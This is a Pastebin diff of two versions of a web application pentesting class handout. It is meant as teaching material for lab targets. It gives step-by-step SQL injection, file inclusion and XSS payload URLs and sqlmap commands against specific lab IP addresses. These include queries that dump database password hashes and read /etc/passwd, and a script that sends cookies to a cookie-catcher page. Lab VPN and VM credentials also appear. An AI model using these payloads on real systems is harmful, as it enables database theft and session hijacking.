View difference between Paste ID: <a href="/nVzsHCvJ">nVzsHCvJ</a> and <a href="/L2rCvk5q">L2rCvk5q</a> - Pastebin.com

View difference between Paste ID: nVzsHCvJ and L2rCvk5q

SHOW: | | - or go back to the newest paste.

1	-	####################
1	+	###########################################
2	-	# Ultimate App Sec #
2	+	# Advanced Web App Pentester Night School #
3	-	####################
3	+	###########################################
4
5
6	-	Download the course slides:
6	+
7	-	https://s3.amazonaws.com/StrategicSec-Files/UltimateAppSec/UltimateAppSec-Week1.pptx
7	+
8	-	http://www.slideshare.net/akilan27/ilugc-curl
8	+
9	-	http://www.slideshare.net/cory_scott/tactical-application-security-getting-stuff-done-black-hat-briefings-2015
9	+
10		#########################
11		# Class Virtual Machine #
12	-	Download the course lab manual:
12	+
13	-	https://s3.amazonaws.com/StrategicSec-Files/UltimateAppSec/Ultimate-App-Sec-V2.pdf
13	+
14
15		Here is the VMWare virtual machine for the class:
16	-	Day 1 (12 Oct class video):
16	+
17	-	https://s3.amazonaws.com/StrategicSec-Videos/UltimateAppSec/2015-10-12+18.03+Ultimate+Web+App+Sec.mp4
17	+	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
18		user: infosecaddicts
19		pass: infosecaddicts
20	-	Day 2 (14 Oct class video):
20	+
21	-	https://s3.amazonaws.com/StrategicSec-Videos/UltimateAppSec/2015-10-14+18.03+Ultimate+Web+App+Sec.mp4
21	+
22		Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
23		If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.
24	-	Day 3 (21 Oct class video):
24	+
25	-	https://s3.amazonaws.com/StrategicSec-Videos/UltimateAppSec/2015-10-21+18.07+Ultimate+Web+App+Sec.mp4
25	+
26
27
28	-	Day 4: (9 Nov class video):
28	+	So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:
29	-	https://s3.amazonaws.com/StrategicSec-Videos/UltimateAppSec/2015-11-09+18.08+Ultimate+Web+App+Sec.mp4
29	+	https://s3.amazonaws.com/infosecaddictsfiles/Strategic-Security-2017-VPN-Info.pdf
30		vpn username: {first_initial.last_name} example: j.mccray
31		vpn password: !@#$vpn4321VPN
32	-	Web App Pentester Night School 2016
32	+
33	-	https://s3.amazonaws.com/StrategicSec-Videos/2016/2016-02-01+18.15+Web+App+Pentester+Night+School+January+2016.mp4
33	+
34	-	https://s3.amazonaws.com/StrategicSec-Videos/2016/2016-02-03+18.10+Web+App+Pentester+Night+School+January+2016.mp4
34	+
35		If you wants some scanning tips you should take a look at the following document:
36		https://s3.amazonaws.com/infosecaddictsfiles/LabNetworkScanningV4.pdf
37	-	Download VMWare Player if you are not currently running a version of Vmware that is newer than VMWare Workstation 11, Vmware Fusion 7, or Vmware Player 11. VMWare Player is free and you download it from here:
37	+
38	-	https://my.vmware.com/web/vmware/free#desktop_end_user_computing/vmware_workstation_player/12_0
38	+
39		#######################
40		# Attacking PHP/MySQL #
41		#######################
42	-	Download the course virtual machines:
42	+
43	-	https://s3.amazonaws.com/StrategicSec-VMs/StrategicsecUbuntu14.zip
43	+	Go to LAMP Target homepage in Firefox
44	-	username: strategicsec
44	+	---------------------------Paste this into Firefox-----------------------------------
45	-	password: strategicsec
45	+	http://45.63.104.73/
46		-------------------------------------------------------------------------------------
47
48
49	-	Start with simple Firefox Addons:
49	+	Clicking on the Acer Link will take you to this page:
50		---------------------------Paste this into Firefox-----------------------------------
51	-	- ShowIP https://addons.mozilla.org/en-US/firefox/addon/showip/
51	+	http://45.63.104.73/acre2.php?lap=acer
52	-	- Server Spy https://addons.mozilla.org/en-US/firefox/addon/server-spy/
52	+	-------------------------------------------------------------------------------------
53	-	- FoxyProxy https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
53	+
54	-	- Tamper Data https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
54	+
55	-	- Wapalyzer https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/
55	+	- Found parameter passing (answer yes to question 1)
56		- Insert ' to test for SQLI
57	-	A good list of web app testing add ons for Firefox:
57	+
58	-	https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/
58	+	---------------------------Paste this into Firefox-----------------------------------
59		http://45.63.104.73/acre2.php?lap=acer'
60		-------------------------------------------------------------------------------------
61
62		Page returns the following error:
63		You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''acer''' at line 1
64
65
66	-	##################################
66	+
67	-	# Basic: Web Application Testing #
67	+	In order to perform union-based sql injection - we must first determine the number of columns in this query.
68	-	##################################
68	+	We do this using the ORDER BY
69		---------------------------Paste this into Firefox-----------------------------------
70	-	Most people are going to tell you reference the OWASP Testing guide.
70	+	http://45.63.104.73/acre2.php?lap=acer' order by 100-- +
71	-	https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
71	+	-------------------------------------------------------------------------------------
72		Page returns the following error:
73	-	I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
73	+	Unknown column '100' in 'order clause'
74
75
76	-	The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
76	+	---------------------------Paste this into Firefox-----------------------------------
77	-
77	+	http://45.63.104.73/acre2.php?lap=acer' order by 50-- +
78	-	1. Does the website talk to a DB?
78	+	-------------------------------------------------------------------------------------
79	-	- Look for parameter passing (ex: site.com/page.php?id=4)
79	+	Page returns the following error:
80	-	- If yes - try SQL Injection
80	+	Unknown column '50' in 'order clause'
81
82	-	2. Can I or someone else see what I type?
82	+
83	-	- If yes - try XSS
83	+	---------------------------Paste this into Firefox-----------------------------------
84		http://45.63.104.73/acre2.php?lap=acer' order by 25-- +
85	-	3. Does the page reference a file?
85	+	-------------------------------------------------------------------------------------
86	-	- If yes - try LFI/RFI
86	+	Page returns the following error:
87		Unknown column '25' in 'order clause'
88	-	Let's start with some manual testing against 54.213.252.28
88	+
89
90		---------------------------Paste this into Firefox-----------------------------------
91	-	Start here:
91	+	http://45.63.104.73/acre2.php?lap=acer' order by 12-- +
92	-	http://54.213.252.28/
92	+	-------------------------------------------------------------------------------------
93		Page returns the following error:
94		Unknown column '50' in 'order clause'
95	-	There's no parameter passing on the home page so the answer to question 1 is NO.
95	+
96	-	There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
96	+
97		---------------------------Paste this into Firefox-----------------------------------
98	-	Try an XSS in the search box on the home page:
98	+	http://45.63.104.73/acre2.php?lap=acer' order by 6-- +
99	-	<script>alert(123);</script>
99	+	-------------------------------------------------------------------------------------
100		---Valid page returned for 5 and 6...error on 7 so we know there are 6 columns
101	-	Doing this gives us the following in the address bar:
101	+
102	-	http://54.213.252.28/BasicSearch.aspx?Word=<script>alert(123);</script>
102	+
103
104	-	Ok, so we've verified that there is XSS in the search box.
104	+	Now we build out the union all select statement with the correct number of columns
105
106	-	Let's move on to the search box in the left of the page.
106	+	Reference:
107		http://www.techonthenet.com/sql/union.php
108	-	Let's give the newsletter signup box a shot
108	+
109
110	-	Moving on to the login page.
110	+	---------------------------Paste this into Firefox-----------------------------------
111	-	http://54.213.252.28/login.aspx
111	+	http://45.63.104.73/acre2.php?lap=acer' union all select 1,2,3,4,5,6-- +
112		-------------------------------------------------------------------------------------
113	-	I entered a single quote (') for both the user name and the password. I got the following error:
113	+
114
115	-	-----------------------------------------------------------------
115	+
116	-	'Users//User[@Name=''' and @Password=''']' has an invalid token.
116	+	Now we negate the parameter value 'acer' by turning into the word 'null':
117	-	Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
117	+	---------------------------Paste this into Firefox-----------------------------------
118		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,4,5,6-- j
119	-	Exception Details: System.Xml.XPath.XPathException: 'Users//User[@Name=''' and @Password=''']' has an invalid token.
119	+	-------------------------------------------------------------------------------------
120
121	-	Source Error:
121	+	We see that a 4 and a 5 are on the screen. These are the columns that will echo back data
122
123
124	-	Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
124	+	Use a cheat sheet for syntax:
125	-	Line 113: string credential = "Users//User[@Name='" + UserName + "' and @Password='" + Password + "']";
125	+	http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet
126	-	Line 114: XmlNodeList xmln = doc.SelectNodes(credential);
126	+
127	-	Line 115: //String test = xmln.ToString();
127	+	---------------------------Paste each of the lines below into Firefox-----------------------------------
128	-	Line 116: if (xmln.Count > 0)
128	+	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),5,6-- j
129
130	-	-----------------------------------------------------------------
130	+	http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),version(),6-- j
131
132		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@version,6-- +
133	-	Hmm....System.Xml.XPath.XPathException.....that's not SQL.
133	+
134		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user(),@@datadir,6-- +
135	-	WTF is this:
135	+
136	-	Line 112: doc.Load(Server.MapPath("") + @"\AuthInfo.xml");
136	+
137		http://45.63.104.73/acre2.php?lap=null' union all select 1,2,3,user,password,6 from mysql.user -- a
138		-------------------------------------------------------------------------------------
139
140
141	-	In this case you'll have the trap the request with a proxy like:
141	+
142	-	- Firefox Tamper Data
142	+	########################
143	-	- Burp Suite http://www.portswigger.net/Burp/proxy.html
143	+	# Question I get a lot #
144	-	- WebScarab https://www.owasp.org/index.php/Category:OWASP_WebScarab_Project
144	+	########################
145	-	- Rat Proxy https://code.google.com/p/ratproxy/
145	+	Sometimes students ask about the "-- j" or "-- +" that I append to SQL injection attack string.
146	-	- Zap Proxy https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
146	+
147	-	- Paros http://sourceforge.net/projects/paros/
147	+	Here is a good reference for it:
148		https://www.symantec.com/connect/blogs/mysql-injection-comments-comments
149
150		Both attackers and penetration testers alike often forget that MySQL comments deviate from the standard ANSI SQL specification. The double-dash comment syntax was first supported in MySQL 3.23.3. However, in MySQL a double-dash comment "requires the second dash to be followed by at least one whitespace or control character (such as a space, tab, newline, and so on)." This double-dash comment syntax deviation is intended to prevent complications that might arise from the subtraction of negative numbers within SQL queries. Therefore, the classic SQL injection exploit string will not work against backend MySQL databases because the double-dash will be immediately followed by a terminating single quote appended by the web application. However, in most cases a trailing space needs to be appended to the classic SQL exploit string. For the sake of clarity we'll append a trailing space and either a "+" or a letter.
151	-	Let's go back to that page error message.....
151	+
152
153
154	-	Let's check it out:
154	+
155	-	http://54.213.252.28/AuthInfo.xml
155	+	Here we see parameter passing, but this one is actually a yes to question number 3 (reference a file)
156		---------------------------Paste this into Firefox-----------------------------------
157	-	Looks like we found passwords!!!!!!!!!!
157	+	http://45.63.104.73/showfile.php?filename=about.txt
158		-------------------------------------------------------------------------------------
159
160	-	Looks like there no significant new functionality after logging in with the stolen credentials.
160	+
161		See if you can read files on the file system:
162	-	Going back to the homepage...let's see if we can see anything. Figured I'd click on one of the links
162	+	---------------------------Paste this into Firefox-----------------------------------
163		http://45.63.104.73/showfile.php?filename=/etc/passwd
164		-------------------------------------------------------------------------------------
165	-	http://54.213.252.28/bookdetail.aspx?id=2
165	+
166		We call this attack a Local File Include or LFI.
167
168	-	Ok, there is parameter passing (bookdetail.aspx?id=2).
168	+	Now let's find some text out on the internet somewhere:
169		---------------------------Paste this into Firefox-----------------------------------
170	-	The page name is: bookdetail.aspx
170	+	https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
171	-	The parameter name is: id
171	+	-------------------------------------------------------------------------------------
172	-	The paramber value is: 2
172	+
173		Now let's append that URL to our LFI and instead of it being Local - it is now a Remote File Include or RFI:
174		---------------------------Paste this into Firefox-----------------------------------
175	-	Let's try throwing a single quote (') in there:
175	+	http://45.63.104.73/showfile.php?filename=https://raw.githubusercontent.com/gruntjs/grunt-contrib-connect/master/test/fixtures/hello.txt
176		-------------------------------------------------------------------------------------
177	-	http://54.213.252.28/bookdetail.aspx?id=2'
177	+
178		-----------------Some Automated Testing from the infosecaddicts VM-----------------
179
180	-	I get the following error:
180	+	##################################################
181		# You can download the virtual machine from here #
182	-	Unclosed quotation mark after the character string ''.
182	+	##################################################
183	-	Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
183	+	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
184		user: infosecaddicts
185	-	Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
185	+	pass: infosecaddicts
186
187
188		-------------------------Type each of these commands---------------------------------
189		cd ~/toolz/sqlmap-dev/
190
191		python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" -b -v 3
192
193
194		python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --current-user -v 3
195
196	-	#############################################################################
196	+
197	-	# SQL Injection #
197	+	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --current-db -v 3
198	-	# https://s3.amazonaws.com/StrategicSec-Files/1-Intro_To_SQL_Intection.pptx #
198	+
199	-	#############################################################################
199	+
200		python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --privileges -v 3
201
202	-	- Another quick way to test for SQLI is to remove the paramter value
202	+
203		python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --dbs -v 3
204
205
206		python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --tables -v 3
207
208	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
208	+
209	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
209	+	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --file-read=/etc/issue -v 3
210	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
210	+
211	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
211	+
212	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
212	+	python sqlmap.py -u "http://45.63.104.73/acre2.php?lap=acer" --file-read=/etc/passwd -v 3
213	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
213	+	-------------------------------------------------------------------------------------
214	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
214	+
215	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
215	+
216	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
216	+
217
218		#############################
219		# Error-Based SQL Injection #
220		#############################
221		---------------------------Paste each of the lines below into Firefox-----------------------------------
222		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
223		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
224	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 100--
224	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
225	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 50--
225	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
226	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 25--
226	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
227	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 10--
227	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
228	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 5--
228	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
229	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 6--
229	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
230	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 7--
230	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
231	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 8--
231	+	-------------------------------------------------------------------------------------
232	-	http://54.213.252.28/bookdetail.aspx?id=2 order by 9--
232	+
233	-	http://54.213.252.28/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
233	+
234
235	-	We are using a union select statement because we are joining the developer's query with one of our own.
235	+
236	-	Reference:
236	+
237	-	http://www.techonthenet.com/sql/union.php
237	+
238	-	The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
238	+	---------------------------Paste each of the lines below into Firefox-----------------------------------
239	-	It removes duplicate rows between the various SELECT statements.
239	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
240		http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
241	-	Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
241	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
242		http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
243	-	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
243	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
244		http://45.77.162.239/bookdetail.aspx?id=2 order by 6--
245	-	Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
245	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 7--
246		http://45.77.162.239/bookdetail.aspx?id=2 order by 8--
247	-	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
247	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 9--
248	-	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
248	+	http://45.77.162.239/bookdetail.aspx?id=2 union all select 1,2,3,4,5,6,7,8,9--
249	-	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
249	+	-------------------------------------------------------------------------------------
250	-	http://54.213.252.28/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
250	+	We are using a union select statement because we are joining the developer's query with one of our own.
251		Reference:
252		http://www.techonthenet.com/sql/union.php
253		The SQL UNION operator is used to combine the result sets of 2 or more SELECT statements.
254		It removes duplicate rows between the various SELECT statements.
255
256		Each SELECT statement within the UNION must have the same number of fields in the result sets with similar data types.
257
258		---------------------------Paste this into Firefox-----------------------------------
259		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,2,3,4,5,6,7,8,9--
260		-------------------------------------------------------------------------------------
261		Negating the paramter value (changing the id=2 to id=-2) will force the pages that will echo back data to be displayed.
262	-
262	+
263		---------------------------Paste each of the lines below into Firefox-----------------------------------
264	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
264	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,4,5,6,7,8,9--
265	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
265	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,7,8,9--
266	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
266	+	http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,db_name(0),8,9--
267		http://45.77.162.239/bookdetail.aspx?id=-2 union all select 1,user,@@version,@@servername,5,6,master.sys.fn_varbintohexstr(password_hash),8,9 from master.sys.sql_logins--
268		-------------------------------------------------------------------------------------
269	-	http://54.213.252.28/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
269	+
270
271
272
273		- Another way is to see if you can get the backend to perform an arithmetic function
274	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
274	+	---------------------------Paste each of the lines below into Firefox-----------------------------------
275	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
275	+	http://45.77.162.239/bookdetail.aspx?id=(2)
276	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
276	+	http://45.77.162.239/bookdetail.aspx?id=(4-2)
277	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
277	+	http://45.77.162.239/bookdetail.aspx?id=(4-1)
278		-------------------------------------------------------------------------------------
279
280	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
280	+	---------------------------Paste each of the lines below into Firefox-----------------------------------
281	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
281	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1=1--
282		http://45.77.162.239/bookdetail.aspx?id=2 or 1=2--
283		http://45.77.162.239/bookdetail.aspx?id=1*1
284	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
284	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 >-1#
285	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
285	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1<99#
286	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
286	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1<>1#
287	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
287	+	http://45.77.162.239/bookdetail.aspx?id=2 or 2 != 3--
288	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
288	+	http://45.77.162.239/bookdetail.aspx?id=2 &0#
289	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
289	+	-------------------------------------------------------------------------------------
290	-	http://54.213.252.28/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
290	+
291
292
293
294		###############################
295		# Blind SQL Injection Testing #
296	-	# Arithmetic logic testing #
296	+
297		Time-Based BLIND SQL INJECTION - EXTRACT DATABASE USER
298
299	-	http://54.213.252.28/bookdetail.aspx?id=(2)
299	+
300	-	http://54.213.252.28/bookdetail.aspx?id=(4-2)
300	+	---------------------------Paste each of the lines below into Firefox-----------------------------------
301	-	http://54.213.252.28/bookdetail.aspx?id=(4-1)
301	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
302	-	http://54.213.252.28/bookdetail.aspx?id=(2*2)
302	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
303	-	http://54.213.252.28/bookdetail.aspx?id=(8/2)
303	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (Ok, the username is 3 chars long - it waited 10 seconds)
304	-	http://54.213.252.28/bookdetail.aspx?id=(2%2B1)
304	+	-------------------------------------------------------------------------------------
305	-	http://54.213.252.28/bookdetail.aspx?id=(2%2B2)
305	+
306		http://45.77.162.239/bookdetail.aspx?id=2; IF ((USER)='dbo') WAITFOR DELAY '00:00:10'--
307
308		Yup, it waited 10 seconds so we know the username is 'dbo' - let's give you the syntax to verify it just for fun.
309	-	# True/False logic testing #
309	+
310		D - 1st Character
311	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1=1--
311	+	---------------------------Paste each of the lines below into Firefox-----------------------------------
312	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1=2--
312	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
313	-	http://54.213.252.28/bookdetail.aspx?id=1*1
313	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
314	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1 >-1#
314	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
315	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1<99#
315	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
316	-	http://54.213.252.28/bookdetail.aspx?id=2 or 1<>1#
316	+	-------------------------------------------------------------------------------------
317	-	http://54.213.252.28/bookdetail.aspx?id=2 or 2 != 3--
317	+
318	-	http://54.213.252.28/bookdetail.aspx?id=2 &0#
318	+
319	-	http://54.213.252.28/bookdetail.aspx?id=2 \|-1#
319	+	---------------------------Paste each of the lines below into Firefox-----------------------------------
320		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
321		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
322		-------------------------------------------------------------------------------------
323
324		O - 3rd Character
325	-	###################################################################
325	+	---------------------------Paste each of the lines below into Firefox-----------------------------------
326	-	# What is XSS #
326	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
327	-	# https://s3.amazonaws.com/StrategicSec-Files/2-Intro_To_XSS.pptx #
327	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
328	-	###################################################################
328	+	http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
329		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
330		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
331		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'--
332		http://45.77.162.239/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
333		-------------------------------------------------------------------------------------
334	-	http://54.172.112.249/xss_practice/
334	+
335
336
337		********************** Class Homework **********************
338
339		Perform a mock penetration test against http://45.63.104.73 using what you have learned in this pastebin.
340
341		You don't need to document it for me, but go through the steps for your own understanding.
342
343
344
345
346
347	-	Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
347	+	********************** Class Challenge **********************
348
349		Let's see how you do with someone else's vulnerable website. Your 1st target is: http://zero.webappsecurity.com
350
351		Here are some sample web app penetration test reports from other companies that you can look at:
352		https://s3.amazonaws.com/infosecaddicts-Files/WebAppSampleReports.zip
353
354		I want you to perform a penetration test against http://zero.webappsecurity.com and document the engagement as if it were a real project.
355
356	-	Ok, click OK and then click back and go back to http://54.172.112.249/xss_practice/
356	+
357		###############################################################################
358		# What is XSS #
359		# https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
360	-	<script>document.location="http://54.172.112.249/xss_practice/cookie_catcher.php?c="+document.cookie</script>
360	+	###############################################################################
361
362		OK - what is Cross Site Scripting (XSS)
363
364		1. Use Firefox to browse to the following location:
365		---------------------------Paste this into Firefox-----------------------------------
366		http://45.63.104.73/xss_practice/
367	-	http://54.172.112.249/xss_practice/cookie_stealer_logs.html
367	+	-------------------------------------------------------------------------------------
368		A really simple search page that is vulnerable should come up.
369
370
371
372
373		2. In the search box type:
374
375		<script>alert('So this is XSS')</script>
376
377
378		This should pop-up an alert window with your message in it proving XSS is in fact possible.
379		Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
380
381
382		3. In the search box type:
383
384		<script>alert(document.cookie)</script>
385
386
387	-	http://54.172.112.249/xss_practice/
387	+
